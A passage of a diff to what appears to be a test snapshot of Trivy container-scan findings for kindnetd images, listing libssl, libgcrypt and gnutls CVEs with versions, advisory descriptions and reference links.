"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4004-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4019-2", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-1/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4004-2/", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-1/", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4019-2/", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://www.openssl.org/news/secadv/20220705.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "timing attack in RSA Decryption implementation", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://www.sqlite.org/releaselog/3_28_0.html", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - ], - }, - "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5305", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5328", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5466", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-6829", - "installedVersion": "1.8.7-6", - "packageName": "libgcrypt20", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-6829", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", - "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", - "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", - "https://www.cve.org/CVERecord?id=CVE-2018-6829", - "https://www.oracle.com/security-alerts/cpujan2020.html", - ], - }, - "category": "Vulnerability", - "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt's ElGamal implementation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: ElGamal implementation doesn't have semantic security due to incorrectly encoded plaintexts possibly allowing to obtain sensitive information", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-6829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-6829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://github.com/weikengchen/attack-on-libgcrypt-elgamal/wiki", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gcrypt-devel/2018-February/004394.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-6829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-6829", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2020.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "3.7.1-5+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2509", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:6854", - "https://access.redhat.com/security/cve/CVE-2022-2509", - "https://bugzilla.redhat.com/2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", - "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", - "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", - "https://errata.almalinux.org/9/ALSA-2022-6854.html", - "https://errata.rockylinux.org/RLSA-2022:6854", - "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", - "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", - "https://linux.oracle.com/cve/CVE-2022-2509.html", - "https://linux.oracle.com/errata/ELSA-2022-7105.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", - "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", - "https://ubuntu.com/security/notices/USN-5550-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2509", - "https://www.debian.org/security/2022/dsa-5203", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Double free during gnutls_pkcs7_verify", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2509", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6854", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2509", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2108977", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "value": "https://www.openssl.org/news/secadv/20230207.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6854", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + }, + { + "type": "URL", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5203", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.7.1-5+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0361", - "installedVersion": "3.7.1-5", - "packageName": "libgnutls30", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:1141", - "https://access.redhat.com/security/cve/CVE-2023-0361", - "https://bugzilla.redhat.com/2162596", - "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", - "https://errata.almalinux.org/9/ALSA-2023-1141.html", - "https://errata.rockylinux.org/RLSA-2023:1569", - "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", - "https://gitlab.com/gnutls/gnutls/-/issues/1050", - "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", - "https://linux.oracle.com/cve/CVE-2023-0361.html", - "https://linux.oracle.com/errata/ELSA-2023-1569.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", - "https://security.netapp.com/advisory/ntap-20230324-0005/", - "https://ubuntu.com/security/notices/USN-5901-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0361", + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing side-channel in the TLS RSA key exchange code", + "name": "Certificate policy check not enabled", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0361", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:1141", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0361", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2162596", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:1569", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "value": 